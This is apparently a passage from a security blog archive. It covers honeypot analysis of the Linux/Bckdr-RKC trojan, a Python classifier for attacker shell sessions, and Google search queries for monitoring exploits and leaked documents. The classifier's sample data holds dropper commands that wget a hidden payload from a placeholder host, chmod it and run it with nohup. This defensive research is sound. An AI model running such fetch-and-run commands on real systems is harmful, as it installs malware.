-The connection string (for example, the client's version banner) will give away what kind of operating system and client software the attacker is using

Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received. 
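Turning the four indicators above into code, as an added example that is not part of the original analysis: inter-command timing, a typo detector that looks for commands one edit away from a known command (including swapped letters), and a crude client guess from the connection banner. The two sessions and their banners are constructed; the assumption is that the honeypot records a timestamp per command and the client's version string, such as an SSH banner.

```python
import statistics

# Added example: apply the four indicators above to a honeypot shell log. The sessions
# and the client banners are constructed; the assumption is that the honeypot records
# the client's version string (e.g. the SSH banner) and a timestamp for each command.
KNOWN_COMMANDS = {"wget", "curl", "chmod", "cd", "ls", "uname", "cat", "tar", "rm", "nohup", "sh", "ps", "id"}


def _edit_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions and
    swaps of adjacent characters each cost 1, so 'wgte' is one edit from 'wget'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def typo_commands(command_lines):
    """Command words that are not known but sit one edit away from a known command."""
    typos = []
    for line in command_lines:
        words = line.split()
        if not words or words[0] in KNOWN_COMMANDS:
            continue
        if any(_edit_distance(words[0], known) == 1 for known in KNOWN_COMMANDS):
            typos.append(words[0])
    return typos


def guess_client(banner):
    """Rough operating-system hint from the client's version string."""
    b = banner.lower()
    if "putty" in b:
        return "PuTTY (Windows)"
    if "libssh" in b or "paramiko" in b:
        return "scripted library client"
    if "openssh" in b:
        return "OpenSSH (Unix-like)"
    return "unknown"


def classify_session(events, client_banner="", manual_gap_seconds=2.0):
    """events: list of (seconds since session start, command line).
    A human needs time to type, so a median gap of a couple of seconds or more, or any
    typo, points to a manual session; back-to-back commands point to a script."""
    times = [t for t, _ in events]
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    median_gap = statistics.median(gaps) if gaps else 0.0
    typos = typo_commands([cmd for _, cmd in events])
    manual = median_gap >= manual_gap_seconds or bool(typos)
    return {"median_gap": median_gap, "typos": typos,
            "client": guess_client(client_banner),
            "verdict": "manual" if manual else "automated"}


# Constructed sessions (the URL is a placeholder, not a real dropper location).
AUTOMATED_SESSION = [(0.00, "cd /tmp"), (0.05, "wget http://example.invalid/.xsyslog"),
                     (0.09, "chmod +x .xsyslog"), (0.12, "nohup ./.xsyslog &")]
MANUAL_SESSION = [(0.0, "uname -a"), (6.5, "cd /tmp"),
                  (11.2, "wgte http://example.invalid/.ssyslog"),
                  (15.9, "wget http://example.invalid/.ssyslog")]
```

The two-second threshold is a starting point, not a constant: tune it against sessions you have already classified by hand, and treat a session that pastes a whole script in one line as automated regardless of what the timing says.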

Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought.

I can't put my finger on it, but after looking at this article on the mystery of the Duqu Framework, and looking at my publicly posted decompilation of Linux/Bckdr-RKC, something strikes me as very familiar between the two.

I've sent this to Kaspersky, so we'll see if they get back to me on it.

Can you see any similarities?  If so, please share!

UPDATE: The virus in question is now being detected by limited AV programs as the "Hutizu" backdoor.

Have you checked out the free security magazines lately, available from Caffeine Security?

Have you checked out the Latest Free IT Security Magazines and Downloads box to the right?

There are some really nice offers available right now, and none of these downloads and magazines cost a dime!

They're just another free service offered by Caffeine Security.

Access some great resources today!

The full catalog of available resources is available here: Complimentary Industry Resources

Coming Soon: Android for the Paranoid Article Series

I've decided to write a series of articles titled "Android for the Paranoid".

The articles will be an in-depth look at some of the Android security related applications out there, and how they can be leveraged by you and your organization.

If you have any apps you would like me to specifically look at, please post in the comments section below!

UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection

UPDATE: The latest news on Linux/Bckdr-RKC (.xsyslog) and Hutizu (.ssyslog) can be viewed HERE, including newest detection statistics.  Thanks!


It's been approximately 2 months since the original discovery of Linux/Bckdr-RKC

This Linux trojan is still undetected, according to VirusTotal.com


Virustotal: .xsyslog
Virustotal: .ssyslog


In fact, it would appear that even Sophos is no longer detecting this trojan.

I have resubmitted the file to multiple antivirus vendors, in hopes that they may pay attention to my submission this time.

For those who aren't familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan.  http://pastebin.com/DwtX9dMd

I'd also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google code project: http://code.google.com/p/caffsec-malware-analysis/

Keep fighting the good fight.

CaffSec SITREP - Cyber Intelligence for the masses

Leveraging the power of Google Alerts, I have started posting relevant news articles, public exploit releases, and other tidbits of information related to Cyber Security and Information Assurance.

The best way to keep you and your organization prepared for unknown threats is to keep tabs on the current state of the security of the internet.

There are currently three ways to view SITREP messages:

Twitter, following @CaffSec
Tumblr through the CaffSec SITREP blog
The CaffSec Daily SITREP Online Newspaper

Please enjoy these valuable resources!

New @CaffSec Twitter Feature: #exploitAlert

I've taken the Google Alert "zero day" exploit feed and created automated Twitter notifications.

You can get updated #exploitAlert notifications by following my Twitter account, @CaffSec.

The feed currently monitors PasteBin for new exploits.  Expect additional feeds soon!

Monitoring for Leaked Company Documents through Google Alerts

This article is part of a series on using Google Alerts to protect you, your family, and your company through early notification of data breaches and leaks.

Previous Articles:

Misuse of Your Personal Information and Google Alerts
Monitoring for New Zero Day Exploits through Google Alerts


If you're following good security practices, all of your internal company documents are properly labeled with important labels such as "Company Proprietary", "Company Sensitive" or "Do Not Distribute".

In fact your company has probably established a standardized header for use on all sensitive documents.

So, when's the last time you performed a Google search for this header?
When's the last time you searched to see what documents are being exposed to the web hosted on your domain?

The results might surprise you.

The Google Hacking Database has some excellent information on how to use Google to find sensitive files.  It's very easy to use some of the search queries there, add your company name or standard header, and see what happens.

In fact, even if you find no results, it would be a great idea to setup Google Alerts to monitor for documents posted (accidentally or otherwise) which appear to be internal company documents.

Here's an example, which should produce results for (hopefully!) intentionally posted documents:

site:blogspot.com filetype:doc OR filetype:xls OR filetype:pdf
The above query will return common office documents which are hosted on blogspot.com, or any subdomains.  Replace blogspot.com with your main domain, and see what results you find.

Beware: Many hackers already know these tricks, and will use them to perform reconnaissance on your company before initiating an attack.  Even the most mundane documents, such as a list of email addresses and phone numbers, could be used to assist in launching a spear phishing (targeted phishing) attack against your company.

Monitoring for New Zero Day Exploits through Google Alerts

In case you haven't read it, I previously posted a how-to for using Google Alerts to monitor for misuse of your personal information...

Misuse of Your Personal Information and Google Alerts

Today I'm going to expand on that post, and show how advanced Google search strings can be used to monitor for other things, such as when new zero day exploits are posted publicly to Pastebin.

For those not familiar with it, Pastebin is a large site which allows anyone to post large amounts of text.  One of the common uses for this site is the public disclosure of new vulnerabilities and exploits.

To leverage some of the more powerful features of Google, use advanced search syntax to narrow your search.  An excellent quick reference is available at Google Guide.

Using our previous method to create an "As it happens" alert, let's try writing a custom query which monitors for new exploits...

intext:exploit OR intext:vulnerability OR intext:"zero day" OR intext:"0day" site:pastebin.com
Further tweaking will allow you to target specific software or a specific manufacturer.  Google gives OR higher precedence than the implied AND between terms, so the query below matches pages that mention microsoft and at least one of the exploit terms; wrapping the OR group in parentheses makes that intent explicit and is worth doing as you add terms:
intext:microsoft (intext:exploit OR intext:vulnerability OR intext:"zero day" OR intext:"0day") site:pastebin.com

I have provided an example RSS feed for a wide zero day search here.

Of course, this won't give you up-to-the-minute searching of Pastebin, but it's better than not monitoring at all.

Malware Analysis Lab - New Feature!

I'm happy to announce that I have created a Google code project called the Caffeine Security Malware Analysis Lab.

At this project, you will be able to see my current research into unknown malware on my honeypot, and even contribute to my research!

I have uploaded source code for xsyslog and ssyslog, which can be accessed through the source code svn repository.

Checkout the project now!